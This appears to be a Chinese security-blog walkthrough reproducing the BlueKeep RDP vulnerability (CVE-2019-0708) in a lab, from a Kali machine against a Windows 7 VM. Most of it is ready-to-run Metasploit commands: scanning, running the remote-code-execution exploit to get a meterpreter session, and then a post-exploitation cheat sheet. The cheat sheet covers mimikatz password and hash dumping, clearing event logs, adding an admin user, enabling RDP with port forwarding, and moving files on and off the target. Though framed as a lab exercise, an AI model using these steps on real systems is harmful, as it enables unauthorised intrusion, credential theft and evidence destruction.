【漏洞复现】CVE-2019-0708漏洞复现

  • A+
所属分类:安全文章
【漏洞复现】CVE-2019-0708漏洞复现

【漏洞复现】CVE-2019-0708漏洞复现




【漏洞复现】CVE-2019-0708漏洞复现






0x00漏洞描述

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708CVE-2019-0708RDP协议的安全漏洞,具有蠕虫功能,因此危害很大。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。


0x01受影响的操作系统

· Windows 2003

· Windows XP

· Windows 7

· Windows Server 2008

·Windows Server 2008 R2


0x02复现环境

攻击机:Linux kali 2020.2IP192.168.61.158 

靶机:Windows 7 X64 IP192.168.61.139


0x03复现过程

一、进入Metasploit框架
1、在kali终端输入msfconsole进入Metasploit,输入
search CVE-2019-0708
搜索CVE-2019-0708可用模块【漏洞复现】CVE-2019-0708漏洞复现
auxiliary/scanner/rdp/cve_2019_0708_bluekeep模块为扫描模块;
exploit/windows/rdp/cve_2019_0708_bluekeep_rce模块为攻击模块;

二、扫描目标主机是否存在漏洞
1、加载扫描模块;
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
2、查看模块中所有的配置参数;
show options
【漏洞复现】CVE-2019-0708漏洞复现
                
3、设置目标主机IP;
set RHOSTS 192.168.61.139

4、执行扫描模块,经检测存在漏洞;
run/exploit #两个命令均可执行
              【漏洞复现】CVE-2019-0708漏洞复现
                
三、利用攻击模块进行渗透测试
1、加载攻击模块;
     
 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2、查看模块中所有的配置参数;
 show options
              【漏洞复现】CVE-2019-0708漏洞复现
                
3、设置目标主机IP;
set RHOSTS 192.168.61.139

4、查看渗透攻击所有支持的目标平台,并且指定目标的操作系统以及补丁类型。

 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets 

Exploit targets:      Id  Name    --  ----    0   Automatic targeting via fingerprinting    1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)    2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)    3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)    4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)    5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)    6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)    7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)    8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1target => 1

5、exploit执行攻击,得到一个meterpreter会话【漏洞复现】CVE-2019-0708漏洞复现

四、后渗透之meterpreter常用命令

1、基本系统命令

sessions                    #sessions -h 查看帮助sessions -i <ID值>             #进入会话   -k 杀死会话backgroud                    #将当前会话放置后台run                            #执行模块输入run tab键按两次列出已有脚本info                        #查看已有模块信息getuid                        #查看权限getpid                        #获取当前进程的pidsysinfo                        #查看目标机系统信息ps                            #查看当前活跃进程    kill<PID值> 杀死进程idletime                    #查看目标机闲置时间reboot/shutdown                #重启/关机shell                        #进入目标机cmdclearav                        #清除windows中的应用程序日志load/use                    #加载模块

2、文件命令

download        #下载文件   download c:\flag.txtupload             #上传文件    uplaod flag.txt c:\flag\cat                #查看文件内容    cat flag.txtdel                #删除指定文件    del c:\flag.txt

3.抓取密码

load mimikatz        #加载mimikatz模块kerberos            #获取明文密码tspkg                #获取明文密码wdigest                #获取密码 跟kerberos相同hashdump            #获取哈希值mimikatz_command -f samdump::hashes        #获取哈希值mimikatz_command -f sekurlsa::searchPasswprds        #获取明文密码

4.getgui命令&enable_rdp

run getgui -h    #查看帮助run getgui -e    #开启远程桌面run getgui -u admin -p admin    #添加用户run getgui -f 1314 -e    #3389端口转发为1314run post/windows/manage/enable_rdp    #开启远程桌面run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin #添加用户run post/windows/manage/enable_rdp FORWARD=true LPORT=1314  #将3389端口转发到1314

5、网络命令

ipconfig/ifconfig        #查看IPnetstat                    #查看端口route                    #查看路由getproxy                #查看代理信息

6、远程桌面

enumdesktops    #查看可用的桌面getdesktop        #获取当前meterpreter 关联的桌面set_desktop        #设置meterpreter关联的桌面  -h查看帮助screenshot        #截屏use espia        #或者使用espia模块截屏  然后输入screengrabrun vnc            #使用vnc远程桌面连接rdesktop        #远程桌面    rdesktop +ip需要在终端输入






往期精彩回顾
【二进制安全】蠕虫样本分析
【web安全】记奇安信“渗透测试”培训
【系统分享】anhunsec靶场练习系统




END


【漏洞复现】CVE-2019-0708漏洞复现



发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: